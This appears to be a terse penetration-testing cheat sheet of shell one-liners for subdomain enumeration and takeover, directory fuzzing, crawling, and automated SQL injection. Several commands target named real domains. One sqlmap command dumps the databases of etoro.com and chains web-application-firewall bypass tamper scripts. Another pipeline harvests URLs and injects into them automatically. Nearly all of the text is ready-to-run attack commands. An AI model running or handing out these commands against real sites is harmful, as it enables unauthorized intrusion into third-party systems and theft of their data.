
Recon:

subfinder -d corp.scribd.com -all -silent -o subdomain.txt ; nmap -iL subdomain.txt -p 443 --script proxynotshell_checker.nse

Subdomain Takeover Using Amass + SubJack

$ amass enum -norecursive -noalts -d {target_domain} > {target_domain}.txt ; subjack -w {target_domain}.txt -t 100 -timeout 30 -ssl -c ~/subjack/fingerprints.json -v 3

python3 ~/tools/dirsearch/dirsearch.py -u TARGET -t 50 -e html

For copying files:

pscp -P 22 Burp.txt admin@ip-172-26-5-166:/home/admin/

subzy --targets target.txt --hide_fails

sqlmap and WAF bypass:

sqlmap -u "https://www.etoro.com/wp-content" --dbs --dump --batch --random-agent --forms --ignore-code=401 --level=5 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned,space2comment,randomcase

Directory fuzzing:

dirsearch -b -u http://target.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,py,rb,php,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,lock,log,rar,old,sql,swp,tar,txt,wadl -x 404,301,302 -r -R 3

katana -u https://admin.mux.com -d 10 -jc -kf -o test-katana.txt

ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml,.sql,.old,.at,.inc -w path -u https://target.com/FUZZ -t 5000

SQL injection (automated):

findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1

Find subdomains:

subfinder -d opensea.io -nW -silent -all

cat | httpx -silent -status-code -follow-redirects -threads 10 | tee domain.txt

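# Crawl every host listed in file_contains_domians.txt with katana, printing a
# coloured banner before each host's results.
lightm='\e[95m'  # ANSI escape: light magenta, used for the host name
lightr='\e[91m'  # ANSI escape: light red, stays active for the output that follows
# IFS= and -r keep each input line intact (no trimming, no backslash processing).
while IFS= read -r sub; do
  # %b expands the \n and \e escapes, as the original `echo -e` did.
  printf '%b\n' "\n${lightm}${sub}\n-----------------------${lightr}"
  # Quoted so the host reaches katana as one literal word (no word splitting or globbing).
  printf '%s\n' "$sub" | katana -silent -headless -depth 3 -js-crawl
done < file_contains_domians.txt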
